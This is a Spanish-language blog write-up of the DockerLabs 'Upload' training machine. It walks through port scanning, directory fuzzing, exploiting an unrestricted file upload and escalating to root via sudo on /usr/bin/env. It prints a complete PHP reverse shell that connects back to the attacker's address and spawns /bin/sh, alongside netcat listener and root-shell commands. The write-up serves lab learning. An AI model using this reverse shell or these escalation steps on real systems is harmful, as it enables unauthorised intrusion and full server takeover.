<!DOCTYPE html>
<html lang="en">
  <head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <meta name="generator" content="Jekyll">
  

  <title>dockerlab.es: máquina UPLOAD - Seres imaginarios que dejan huella</title>

  <link rel="stylesheet" href="/css/main.css">
  <link rel="shortcut icon" type="image/x-icon" href="/assets/favicon.ico">
  <link rel="alternate" type="application/rss+xml" title="Seres imaginarios que dejan huella" href="http://localhost:4000/feed.xml"> <!-- Begin Jekyll SEO tag v2.8.0 -->
<meta name="generator" content="Jekyll v4.3.3" />
<meta property="og:title" content="dockerlab.es: máquina UPLOAD" />
<meta name="author" content="Danielprz21" />
<meta property="og:locale" content="en_US" />
<meta name="description" content="danielprz writeups y cosas…" />
<meta property="og:description" content="danielprz writeups y cosas…" />
<link rel="canonical" href="http://localhost:4000/blog/2024/dockerlab-es-maquina-upload" />
<meta property="og:url" content="http://localhost:4000/blog/2024/dockerlab-es-maquina-upload" />
<meta property="og:site_name" content="Seres imaginarios que dejan huella" />
<meta property="og:image" content="http://localhost:4000/blog/assets/dockerlab.es_upload/portada.png" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2024-04-14T20:37:00+02:00" />
<meta name="twitter:card" content="summary_large_image" />
<meta property="twitter:image" content="http://localhost:4000/blog/assets/dockerlab.es_upload/portada.png" />
<meta property="twitter:title" content="dockerlab.es: máquina UPLOAD" />
<meta name="twitter:site" content="@danielprz" />
<meta name="twitter:creator" content="@Danielprz21" />
<script type="application/ld+json">
{"@context":"https://schema.org","@type":"BlogPosting","author":{"@type":"Person","name":"Danielprz21"},"dateModified":"2024-04-14T20:37:00+02:00","datePublished":"2024-04-14T20:37:00+02:00","description":"danielprz writeups y cosas…","headline":"dockerlab.es: máquina UPLOAD","image":"http://localhost:4000/blog/assets/dockerlab.es_upload/portada.png","mainEntityOfPage":{"@type":"WebPage","@id":"http://localhost:4000/blog/2024/dockerlab-es-maquina-upload"},"url":"http://localhost:4000/blog/2024/dockerlab-es-maquina-upload"}</script>
<!-- End Jekyll SEO tag -->

</head>


  <body>
    <div id="wrapper">
      <header>
  <div>
    <a href="/">
    
    <h1><!--email_off-->danielprz21@home:~$<!--/email_off--></h1>
    </a>
    <div class="header-links">
      <a href="/about"><h2 class="header-link">Yo</h2></a>
<a href="/"><h2 class="header-link">Blog</h2></a>
<a href="/tags/"><h2 class="header-link">Etiquetas</h2></a>

<!--<a href="/feed.xml"><h2 class="header-link">RSS</h2></a>-->

    </div>
  </div>
</header>

      <div class="container">
        <section id="main_content">
          <article>
  <h2>dockerlab.es: máquina UPLOAD</h2>
  <div class="postitem">
    
      <a href="/blog/" class="no-decoration"><code class="language-plaintext highlighter-rouge">blog</code></a>
    
    
      <code class="posttag"><a href="/tags/#docker" class="no-decoration">docker</a></code>
    
      <code class="posttag"><a href="/tags/#web-fuzzing" class="no-decoration">Web fuzzing</a></code>
    
      <code class="posttag"><a href="/tags/#ethical-hacking" class="no-decoration">Ethical Hacking</a></code>
    
      <code class="posttag"><a href="/tags/#cybersecurity" class="no-decoration">Cybersecurity</a></code>
    
      <code class="posttag"><a href="/tags/#binarios-unix" class="no-decoration">binarios unix</a></code>
    
      <code class="posttag"><a href="/tags/#arbitrary-file-upload" class="no-decoration">Arbitrary File Upload</a></code>
    
      <code class="posttag"><a href="/tags/#reverse-shell" class="no-decoration">reverse shell</a></code>
    
      <code class="posttag"><a href="/tags/#owasp" class="no-decoration">owasp</a></code>
    
  </div>
  <time datetime="2024-04-14T20:37:00+02:00" class="by-line">14 Apr 2024</time>
  <p><br />
<img src="/blog/assets/dockerlab.es_upload/portada.png" alt="" />
<br /></p>

<p><br /></p>
<h3 id="descripción">Descripción</h3>
<hr />
<p><br /></p>

<p><br /></p>

<h3 id="enlace-de-lab">Enlace de Lab:</h3>
<p><a href="https://www.dockerlabs.es/">Dockerlabs: Upload</a></p>

<h3 id="dificultad">Dificultad:</h3>
<p>FÁCIL</p>

<h3 id="solución">Solución</h3>
<hr />
<p><br /></p>

<p>Antes de iniciar este laboratorio, es importante destacar que se trata de máquinas docker que se despliegan localmente en entornos Linux, facilitando así el despliegue de estos laboratorios en máquinas con pocos recursos o virtualizadas.</p>

<p>Al descargar el laboratorio, lo primero que encontramos son dos archivos.</p>

<p><br />
<img src="/blog/assets/dockerlab.es_upload/paso_1.png" alt="" />
<br /></p>

<p><code class="language-plaintext highlighter-rouge">auto_deploy.sh</code>: este archivo se encarga de desplegar la máquina mediante docker y, una vez presionamos <em>ctrl+c</em>, pasa a un proceso de borrado, todo automático, sin necesidad de tener conocimientos de docker.</p>

<p><code class="language-plaintext highlighter-rouge">upload.tar</code>: contiene todo el contenido de la máquina docker; es el corazón, donde está la máquina víctima.</p>

<p>Para desplegar el laboratorio, lo primero que debemos hacer es:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>bash auto_deploy.sh upload.tar
</code></pre></div></div>
<p><br />
<img src="/blog/assets/dockerlab.es_upload/paso_2.png" alt="" />
<br /></p>

<p>Una vez desplegada nuestra máquina vulnerable, lo primero que debemos identificar es qué puertos tiene disponibles.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>nmap <span class="nt">-p-</span> <span class="nt">-Pn</span>  <span class="nt">-sS</span> <span class="nt">--min-rate</span> 5000 <span class="nt">--open</span> 172.17.0.2  <span class="nt">-oX</span> report.xml <span class="nt">-v</span>
</code></pre></div></div>
<p>donde:</p>

<p><code class="language-plaintext highlighter-rouge">-p-</code>: Escanea todos los puertos existentes (0-65365)
<code class="language-plaintext highlighter-rouge">-Pn</code>: Evita que <code class="language-plaintext highlighter-rouge">nmap</code> realice un descubrimiento de host antes de realizar el escaneo
<code class="language-plaintext highlighter-rouge">-sS</code>: Realiza un escaneo de puertos TCP mediante un escaneo SYN. Esto implica enviar un paquete SYN y esperar una respuesta; si el puerto está abierto, el host responderá con un paquete SYN-ACK
<code class="language-plaintext highlighter-rouge">--min-rate</code>: Configura la tasa mínima de paquetes enviados a 5000 paquetes por segundo. Esto acelera el escaneo, ya que <code class="language-plaintext highlighter-rouge">nmap</code> enviará paquetes a una tasa muy alta
<code class="language-plaintext highlighter-rouge">--open</code>: Esta opción le indica a <code class="language-plaintext highlighter-rouge">nmap</code> que sólo muestre los puertos que están abiertos.
<code class="language-plaintext highlighter-rouge">-oX</code>: Guarda la salida del escaneo en un archivo XML llamado <code class="language-plaintext highlighter-rouge">report.xml</code>
<code class="language-plaintext highlighter-rouge">-v</code>: Aumenta la verbosidad de la salida de <code class="language-plaintext highlighter-rouge">nmap</code>, proporcionando más detalles sobre lo que está haciendo <code class="language-plaintext highlighter-rouge">nmap</code>.
<br />
<img src="/blog/assets/dockerlab.es_upload/paso_3.png" alt="" />
<br /></p>

<p>Nos damos cuenta de que el <code class="language-plaintext highlighter-rouge">puerto 80</code> es el único disponible, en otras palabras, nuestro punto de acceso a la máquina vulnerable será por el puerto 80, el cual (en la mayoría de casos) pertenece a un servicio web.</p>

<p>Para identificar versiones, tipo de web, tecnología usada y detalles que nos pueden dar pistas en esta fase de reconocimiento, ejecutamos el siguiente código:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>whatweb http://172.17.0.2
</code></pre></div></div>
<p><br />
<img src="/blog/assets/dockerlab.es_upload/paso_4.png" alt="" />
<br /></p>

<p>Nos fijamos en unas palabras bastante peculiares e interesantes:</p>

<p><code class="language-plaintext highlighter-rouge">Upload here your file</code></p>

<p>Lo cual nos da pistas para entender que estamos frente a una vulnerabilidad de <code class="language-plaintext highlighter-rouge">Arbitrary File Upload</code><sup id="fnref:1" role="doc-noteref"><a href="#fn:1" class="footnote" rel="footnote">1</a></sup> posiblemente.</p>

<p>Accedemos a la web y nos encontramos con la siguiente interfaz, sencilla pero suficiente para provocar la vulnerabilidad que ya sospechábamos, por el hecho de que se puede subir archivos.</p>

<p><br />
<img src="/blog/assets/dockerlab.es_upload/paso_5.png" alt="" />
<br /></p>

<p>Para ver si podemos ejecutar código con intenciones malignas, creamos un archivo PHP con el siguiente código:</p>

<div class="language-php highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">&lt;?php</span> 
<span class="nb">system</span><span class="p">(</span><span class="s1">'whoami'</span><span class="p">);</span> 
<span class="cp">?&gt;</span>
</code></pre></div></div>

<p><br />
<img src="/blog/assets/dockerlab.es_upload/paso_6.png" alt="" />
<br /></p>

<p>Nos fijamos que ha sido aceptado correctamente; no necesitamos recurrir a ninguna técnica de <code class="language-plaintext highlighter-rouge">File upload bypass</code><sup id="fnref:2" role="doc-noteref"><a href="#fn:2" class="footnote" rel="footnote">2</a></sup>.</p>

<p>Todo correcto, pero,</p>

<p><strong><em>¿Dónde se ha subido este archivo de código con intenciones malignas?</em></strong></p>

<p>Ahora nos toca hacer <em>fuzzing</em> <sup id="fnref:3" role="doc-noteref"><a href="#fn:3" class="footnote" rel="footnote">3</a></sup>.</p>

<p>Para esto, ejecutamos un programa llamado <em>wfuzz</em> <sup id="fnref:4" role="doc-noteref"><a href="#fn:4" class="footnote" rel="footnote">4</a></sup> con las siguientes instrucciones:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>wfuzz <span class="nt">-c</span> <span class="nt">--hc</span> 404 <span class="nt">-t</span> 200 <span class="nt">-w</span> /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt http://172.17.0.2/FUZZ
</code></pre></div></div>

<p>Donde:</p>

<p><code class="language-plaintext highlighter-rouge">-c</code>: Este comando es simplemente para proporcionar un poco de color a la salida de datos.</p>

<p><code class="language-plaintext highlighter-rouge">--hc 404</code>: Ignora todas las respuestas cuyo estado sea 404 (Not Found).</p>

<p><code class="language-plaintext highlighter-rouge">-t 200</code>: Asigna una cantidad de hilos (200) para que ejecuten el recorrido de diccionario en paralelo.</p>

<p><code class="language-plaintext highlighter-rouge">-w</code>: Este parámetro es para especificar de qué diccionario de datos tomará las palabras para hacer el fuzzing</p>

<p>web.</p>

<p><br />
<img src="/blog/assets/dockerlab.es_upload/paso_7.png" alt="" />
<br /></p>

<p>Nos damos cuenta de que hay un directorio llamado <code class="language-plaintext highlighter-rouge">uploads</code>.</p>

<p>Si accedemos a ese directorio, veremos que hay un archivo llamado <code class="language-plaintext highlighter-rouge">whoami.php</code> que corresponde con el que subimos anteriormente.</p>

<p><br />
<img src="/blog/assets/dockerlab.es_upload/paso_8.png" alt="" />
<br /></p>

<p>Si lo abrimos, veremos <code class="language-plaintext highlighter-rouge">www-data</code>, lo cual nos confirma que estamos ejecutando código en la máquina víctima.</p>

<p><br />
<img src="/blog/assets/dockerlab.es_upload/paso_9.png" alt="" />
<br /></p>

<p>Ahora es momento de crear una <code class="language-plaintext highlighter-rouge">reverse shell</code> para poder ingresar al servidor y poder escalar privilegios.</p>

<p>Para ello, hay una infinidad de reverse shells en PHP en la red, en mi caso usaré la siguiente:</p>

<div class="language-php highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">&lt;?php</span>

<span class="nb">set_time_limit</span> <span class="p">(</span><span class="mi">0</span><span class="p">);</span>
<span class="nv">$VERSION</span> <span class="o">=</span> <span class="s2">"1.0"</span><span class="p">;</span>
<span class="nv">$ip</span> <span class="o">=</span> <span class="s1">'172.18.0.1'</span><span class="p">;</span>  <span class="c1">// CHANGE THIS</span>
<span class="nv">$port</span> <span class="o">=</span> <span class="mi">443</span><span class="p">;</span>       <span class="c1">// CHANGE THIS</span>
<span class="nv">$chunk_size</span> <span class="o">=</span> <span class="mi">1400</span><span class="p">;</span>
<span class="nv">$write_a</span> <span class="o">=</span> <span class="kc">null</span><span class="p">;</span>
<span class="nv">$error_a</span> <span class="o">=</span> <span class="kc">null</span><span class="p">;</span>
<span class="nv">$shell</span> <span class="o">=</span> <span class="s1">'uname -a; w; id; /bin/sh -i'</span><span class="p">;</span>
<span class="nv">$daemon</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="nv">$debug</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>

<span class="c1">//</span>
<span class="c1">// Daemonise ourself if possible to avoid zombies later</span>
<span class="c1">//</span>

<span class="c1">// pcntl_fork is hardly ever available, but will allow us to daemonise</span>
<span class="c1">// our php process and avoid zombies.  Worth a try...</span>
<span class="k">if</span> <span class="p">(</span><span class="nb">function_exists</span><span class="p">(</span><span class="s1">'pcntl_fork'</span><span class="p">))</span> <span class="p">{</span>
	<span class="c1">// Fork and have the parent process exit</span>
	<span class="nv">$pid</span> <span class="o">=</span> <span class="nb">pcntl_fork</span><span class="p">();</span>
	
	<span class="k">if</span> <span class="p">(</span><span class="nv">$pid</span> <span class="o">==</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span>
		<span class="nf">printit</span><span class="p">(</span><span class="s2">"ERROR: Can't fork"</span><span class="p">);</span>
		<span class="k">exit</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span>
	<span class="p">}</span>
	
	<span class="k">if</span> <span class="p">(</span><span class="nv">$pid</span><span class="p">)</span> <span class="p">{</span>
		<span class="k">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>  <span class="c1">// Parent exits</span>
	<span class="p">}</span>

	<span class="c1">// Make the current process a session leader</span>
	<span class="c1">// Will only succeed if we forked</span>
	<span class="k">if</span> <span class="p">(</span><span class="nb">posix_setsid</span><span class="p">()</span> <span class="o">==</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span>
		<span class="nf">printit</span><span class="p">(</span><span class="s2">"Error: Can't setsid()"</span><span class="p">);</span>
		<span class="k">exit</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span>
	<span class="p">}</span>

	<span class="nv">$daemon</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span>
<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
	<span class="nf">printit</span><span class="p">(</span><span class="s2">"WARNING: Failed to daemonise.  This is quite common and not fatal."</span><span class="p">);</span>
<span class="p">}</span>

<span class="c1">// Change to a safe directory</span>
<span class="nb">chdir</span><span class="p">(</span><span class="s2">"/"</span><span class="p">);</span>

<span class="c1">// Remove any umask we inherited</span>
<span class="nb">umask</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>

<span class="c1">//</span>
<span class="c1">// Do the reverse shell...</span>
<span class="c1">//</span>

<span class="c1">// Open reverse connection</span>
<span class="nv">$sock</span> <span class="o">=</span> <span class="nb">fsockopen</span><span class="p">(</span><span class="nv">$ip</span><span class="p">,</span> <span class="nv">$port</span><span class="p">,</span> <span class="nv">$errno</span><span class="p">,</span> <span class="nv">$errstr</span><span class="p">,</span> <span class="mi">30</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="nv">$sock</span><span class="p">)</span> <span class="p">{</span>
	<span class="nf">printit</span><span class="p">(</span><span class="s2">"</span><span class="nv">$errstr</span><span class="s2"> (</span><span class="nv">$errno</span><span class="s2">)"</span><span class="p">);</span>
	<span class="k">exit</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span>
<span class="p">}</span>

<span class="c1">// Spawn shell process</span>
<span class="nv">$descriptorspec</span> <span class="o">=</span> <span class="k">array</span><span class="p">(</span>
   <span class="mi">0</span> <span class="o">=&gt;</span> <span class="k">array</span><span class="p">(</span><span class="s2">"pipe"</span><span class="p">,</span> <span class="s2">"r"</span><span class="p">),</span>  <span class="c1">// stdin is a pipe that the child will read from</span>
   <span class="mi">1</span> <span class="o">=&gt;</span> <span class="k">array</span><span class="p">(</span><span class="s2">"pipe"</span><span class="p">,</span> <span class="s2">"w"</span><span class="p">),</span>  <span class="c1">// stdout is a pipe that the child will write to</span>
   <span class="mi">2</span> <span class="o">=&gt;</span> <span class="k">array</span><span class="p">(</span><span class="s2">"pipe"</span><span class="p">,</span> <span class="s2">"w"</span><span class="p">)</span>   <span class="c1">// stderr is a pipe that the child will write to</span>
<span class="p">);</span>

<span class="nv">$process</span> <span class="o">=</span> <span class="nb">proc_open</span><span class="p">(</span><span class="nv">$shell</span><span class="p">,</span> <span class="nv">$descriptorspec</span><span class="p">,</span> <span class="nv">$pipes</span><span class="p">);</span>

<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="nb">is_resource</span><span class="p">(</span><span class="nv">$process</span><span class="p">))</span> <span class="p">{</span>
	<span class="nf">printit</span><span class="p">(</span><span class="s2">"ERROR: Can't spawn shell"</span><span class="p">);</span>
	<span class="k">exit</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span>
<span class="p">}</span>

<span class="c1">// Set everything to non-blocking</span>
<span class="c1">// Reason: Occsionally reads will block, even though stream_select tells us they won't</span>
<span class="nb">stream_set_blocking</span><span class="p">(</span><span class="nv">$pipes</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="mi">0</span><span class="p">);</span>
<span class="nb">stream_set_blocking</span><span class="p">(</span><span class="nv">$pipes</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="mi">0</span><span class="p">);</span>
<span class="nb">stream_set_blocking</span><span class="p">(</span><span class="nv">$pipes</span><span class="p">[</span><span class="mi">2</span><span class="p">],</span> <span class="mi">0</span><span class="p">);</span>
<span class="nb">stream_set_blocking</span><span class="p">(</span><span class="nv">$sock</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>

<span class="nf">printit</span><span class="p">(</span><span class="s2">"Successfully opened reverse shell to </span><span class="nv">$ip</span><span class="s2">:</span><span class="nv">$port</span><span class="s2">"</span><span class="p">);</span>

<span class="k">while</span> <span class="p">(</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span>
	<span class="c1">// Check for end of TCP connection</span>
	<span class="k">if</span> <span class="p">(</span><span class="nb">feof</span><span class="p">(</span><span class="nv">$sock</span><span class="p">))</span> <span class="p">{</span>
		<span class="nf">printit</span><span class="p">(</span><span class="s2">"ERROR: Shell connection terminated"</span><span class="p">);</span>
		<span class="k">break</span><span class="p">;</span>
	<span class="p">}</span>

	<span class="c1">// Check for end of STDOUT</span>
	<span class="k">if</span> <span class="p">(</span><span class="nb">feof</span><span class="p">(</span><span class="nv">$pipes</span><span class="p">[</span><span class="mi">1</span><span class="p">]))</span> <span class="p">{</span>
		<span class="nf">printit</span><span class="p">(</span><span class="s2">"ERROR: Shell process terminated"</span><span class="p">);</span>
		<span class="k">break</span><span class="p">;</span>
	<span class="p">}</span>

	<span class="c1">// Wait until a command is end down $sock, or some</span>
	<span class="c1">// command output is available on STDOUT or STDERR</span>
	<span class="nv">$read_a</span> <span class="o">=</span> <span class="k">array</span><span class="p">(</span><span class="nv">$sock</span><span class="p">,</span> <span class="nv">$pipes</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="nv">$pipes</span><span class="p">[</span><span class="mi">2</span><span class="p">]);</span>
	<span class="nv">$num_changed_sockets</span> <span class="o">=</span> <span class="nb">stream_select</span><span class="p">(</span><span class="nv">$read_a</span><span class="p">,</span> <span class="nv">$write_a</span><span class="p">,</span> <span class="nv">$error_a</span><span class="p">,</span> <span class="kc">null</span><span class="p">);</span>

	<span class="c1">// If we can read from the TCP socket, send</span>
	<span class="c1">// data to process's STDIN</span>
	<span class="k">if</span> <span class="p">(</span><span class="nb">in_array</span><span class="p">(</span><span class="nv">$sock</span><span class="p">,</span> <span class="nv">$read_a</span><span class="p">))</span> <span class="p">{</span>
		<span class="k">if</span> <span class="p">(</span><span class="nv">$debug</span><span class="p">)</span> <span class="nf">printit</span><span class="p">(</span><span class="s2">"SOCK READ"</span><span class="p">);</span>
		<span class="nv">$input</span> <span class="o">=</span> <span class="nb">fread</span><span class="p">(</span><span class="nv">$sock</span><span class="p">,</span> <span class="nv">$chunk_size</span><span class="p">);</span>
		<span class="k">if</span> <span class="p">(</span><span class="nv">$debug</span><span class="p">)</span> <span class="nf">printit</span><span class="p">(</span><span class="s2">"SOCK: </span><span class="nv">$input</span><span class="s2">"</span><span class="p">);</span>
		<span class="nb">fwrite</span><span class="p">(</span><span class="nv">$pipes</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="nv">$input</span><span class="p">);</span>
	<span class="p">}</span>

	<span class="c1">// If we can read from the process's STDOUT</span>
	<span class="c1">// send data down tcp connection</span>
	<span class="k">if</span> <span class="p">(</span><span class="nb">in_array</span><span class="p">(</span><span class="nv">$pipes</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="nv">$read_a</span><span class="p">))</span> <span class="p">{</span>
		<span class="k">if</span> <span class="p">(</span><span class="nv">$debug</span><span class="p">)</span> <span class="nf">printit</span><span class="p">(</span><span class="s2">"STDOUT READ"</span><span class="p">);</span>
		<span class="nv">$input</span> <span class="o">=</span> <span class="nb">fread</span><span class="p">(</span><span class="nv">$pipes</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="nv">$chunk_size</span><span class="p">);</span>
		<span class="k">if</span> <span class="p">(</span><span class="nv">$debug</span><span class="p">)</span> <span class="nf">printit</span><span class="p">(</span><span class="s2">"STDOUT: </span><span class="nv">$input</span><span class="s2">"</span><span class="p">);</span>
		<span class="nb">fwrite</span><span class="p">(</span><span class="nv">$sock</span><span class="p">,</span> <span class="nv">$input</span><span class="p">);</span>
	<span class="p">}</span>

	<span class="c1">// If we can read from the process's STDERR</span>
	<span class="c1">// send data down tcp connection</span>
	<span class="k">if</span> <span class="p">(</span><span class="nb">in_array</span><span class="p">(</span><span class="nv">$pipes</span><span class="p">[</span><span class="mi">2</span><span class="p">],</span> <span class="nv">$read_a</span><span class="p">))</span> <span class="p">{</span>
		<span class="k">if</span> <span class="p">(</span><span class="nv">$debug</span><span class="p">)</span> <span class="nf">printit</span><span class="p">(</span><span class="s2">"STDERR READ"</span><span class="p">);</span>
		<span class="nv">$input</span> <span class="o">=</span> <span class="nb">fread</span><span class="p">(</span><span class="nv">$pipes</span><span class="p">[</span><span class="mi">2</span><span class="p">],</span> <span class="nv">$chunk_size</span><span class="p">);</span>
		<span class="k">if</span> <span class="p">(</span><span class="nv">$debug</span><span class="p">)</span> <span class="nf">printit</span><span class="p">(</span><span class="s2">"STDERR: </span><span class="nv">$input</span><span class="s2">"</span><span class="p">);</span>
		<span class="nb">fwrite</span><span class="p">(</span><span class="nv">$sock</span><span class="p">,</span> <span class="nv">$input</span><span class="p">);</span>
	<span class="p">}</span>
<span class="p">}</span>

<span class="nb">fclose</span><span class="p">(</span><span class="nv">$sock</span><span class="p">);</span>
<span class="nb">fclose</span><span class="p">(</span><span class="nv">$pipes</span><span class="p">[</span><span class="mi">0</span><span class="p">]);</span>
<span class="nb">fclose</span><span class="p">(</span><span class="nv">$pipes</span><span class="p">[</span><span class="mi">1</span><span class="p">]);</span>
<span class="nb">fclose</span><span class="p">(</span><span class="nv">$pipes</span><span class="p">[</span><span class="mi">2</span><span class="p">]);</span>
<span class="nb">proc_close</span><span class="p">(</span><span class="nv">$process</span><span class="p">);</span>

<span class="c1">// Like print, but does nothing if we've daemonised ourself</span>
<span class="c1">// (I can't figure out how to redirect STDOUT like a proper daemon)</span>
<span class="k">function</span> <span class="n">printit</span> <span class="p">(</span><span class="nv">$string</span><span class="p">)</span> <span class="p">{</span>
	<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="nv">$daemon</span><span class="p">)</span> <span class="p">{</span>
		<span class="k">print</span> <span class="s2">"</span><span class="nv">$string</span><span class="se">\n</span><span class="s2">"</span><span class="p">;</span>
	<span class="p">}</span>
<span class="p">}</span>

<span class="cp">?&gt;</span> 
</code></pre></div></div>

<p>Y la subimos mediante el formulario y tendríamos lo siguiente en el directorio <code class="language-plaintext highlighter-rouge">uploads</code>.</p>

<p><br />
<img src="/blog/assets/dockerlab.es_upload/paso_10.png" alt="" />
<br /></p>

<p>Antes de presionar, debemos correr en una terminal la siguiente sentencia:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>nc <span class="nt">-lvnp</span> 443
</code></pre></div></div>
<p>Ahora hacemos click sobre el archivo <code class="language-plaintext highlighter-rouge">reverse_shell.php</code>.</p>

<p>Y en nuestra terminal que corría <code class="language-plaintext highlighter-rouge">nc</code> debería aparecer lo siguiente:</p>

<p><br />
<img src="/blog/assets/dockerlab.es_upload/paso_11.png" alt="" />
<br /></p>

<p>Ahora es momento de tratar la bash, más que nada para poder hacer <code class="language-plaintext highlighter-rouge">ctrl+c</code> sin matar la <code class="language-plaintext highlighter-rouge">reverse_shell</code> y <code class="language-plaintext highlighter-rouge">ctrl+l</code> para poder limpiar la pantalla:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>script /dev/null <span class="nt">-c</span> bash
</code></pre></div></div>

<p><code class="language-plaintext highlighter-rouge">ctrl+z</code></p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">stty </span>raw <span class="nt">-echo</span><span class="p">;</span> <span class="nb">fg
</span>reset xterm
<span class="nb">export </span><span class="nv">TERM</span><span class="o">=</span>xterm
<span class="nb">export </span><span class="nv">SHELL</span><span class="o">=</span>bash
</code></pre></div></div>

<p>Si hacemos nano, vi o cat, la pantalla nos aparecerá pequeña y no podremos crear archivos con total libertad. Para ello, corremos lo siguiente:</p>

<p>Abrimos una terminal nueva y corremos:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">stty </span>size
</code></pre></div></div>
<p><br />
<img src="/blog/assets/dockerlab.es_upload/bash.png" alt="" />
<br />
Nos aparecerán dos números, el primero corresponde a las <code class="language-plaintext highlighter-rouge">rows</code> y el segundo a <code class="language-plaintext highlighter-rouge">columns</code>.</p>

<p>Abrimos la <code class="language-plaintext highlighter-rouge">reverse shell</code> y corremos el siguiente código:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">stty </span>rows 24 columns 128
</code></pre></div></div>

<p>Ya que tenemos una bash totalmente funcional e interactiva, vamos a empezar a examinar las rutas de escalada de privilegios.</p>

<p>En este caso, con correr el comando <code class="language-plaintext highlighter-rouge">sudo -l</code> nos aparece lo siguiente:</p>

<p><br />
<img src="/blog/assets/dockerlab.es_upload/paso_12.png" alt="" />
<br /></p>

<p>Es decir, podemos ejecutar el binario <code class="language-plaintext highlighter-rouge">/usr/bin/env</code> como root sin necesidad de proporcionar contraseña.</p>

<p>Esto es una muy buena noticia para nosotros como atacantes, porque si nos dirigimos a <code class="language-plaintext highlighter-rouge">GTFOBins</code><sup id="fnref:5" role="doc-noteref"><a href="#fn:5" class="footnote" rel="footnote">5</a></sup> vemos que con el siguiente código podemos acceder a root:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">sudo</span> /usr/bin/env /bin/sh
</code></pre></div></div>

<p>Lo ejecutamos y:</p>

<p><br />
<img src="/blog/assets/dockerlab.es_upload/paso_13.png" alt="" />
<br /></p>

<p>¡Perfecto! Ya somos <code class="language-plaintext highlighter-rouge">root</code>.</p>

<p>Para borrar la máquina solo debemos ir a la consola donde lo desplegamos y presionar <code class="language-plaintext highlighter-rouge">ctrl+c</code>, y eliminaría y borraría todo rastro de la máquina víctima en nuestro sistema LINUX.</p>

<p><br />
<img src="/blog/assets/dockerlab.es_upload/paso_14.png" alt="" />
<br /></p>

<p>Y eso sería todo.</p>

<p><br /></p>
<h3 id="referencias"><em>Referencias</em></h3>
<hr />
<div class="footnotes" role="doc-endnotes">
  <ol>
    <li id="fn:1" role="doc-endnote">
      <p><a href="https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload">Arbitrary File Upload Vulnerability</a> <a href="#fnref:1" class="reversefootnote" role="doc-backlink">&#8617;</a></p>
    </li>
    <li id="fn:2" role="doc-endnote">
      <p><a href="https://vulp3cula.gitbook.io/hackers-grimoire/exploitation/web-application/file-upload-bypass">File upload bypass</a> <a href="#fnref:2" class="reversefootnote" role="doc-backlink">&#8617;</a></p>
    </li>
    <li id="fn:3" role="doc-endnote">
      <p><a href="https://www.sysadminok.es/blog/ciberseguridad/que-es-y-para-que-sirve-el-fuzzing-un-enfoque-integral-a-la-seguridad-de-software/">Fuzzing</a> <a href="#fnref:3" class="reversefootnote" role="doc-backlink">&#8617;</a></p>
    </li>
    <li id="fn:4" role="doc-endnote">
      <p><a href="https://wfuzz.readthedocs.io/en/latest/">Wfuzz Github</a> <a href="#fnref:4" class="reversefootnote" role="doc-backlink">&#8617;</a></p>
    </li>
    <li id="fn:5" role="doc-endnote">
      <p><a href="https://gtfobins.github.io">GTFOBins docu</a> <a href="#fnref:5" class="reversefootnote" role="doc-backlink">&#8617;</a></p>
    </li>
  </ol>
</div>

</article>

        </section>
      </div>
    </div>

     
  
    <footer class="site-footer">
  <div class="row">
    <div class="footer-wrapper">
      <div class="footer-col-social col-5 col-s-4">
        <ul>
  
    <li class="social-media-list">
      <a title="Email Address" href="mailto:rubel.daniel.perez@gmail.com"><span class="icon"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 12.713l-11.985-9.713h23.971l-11.986 9.713zm-5.425-1.822l-6.575-5.329v12.501l6.575-7.172zm10.85 0l6.575 7.172v-12.501l-6.575 5.329zm-1.557 1.261l-3.868 3.135-3.868-3.135-8.11 8.848h23.956l-8.11-8.848z"/></svg>
</span><span>rubel.daniel.perez@gmail.com</span></a>
    </li>
  

  
    <li class="social-media-list">
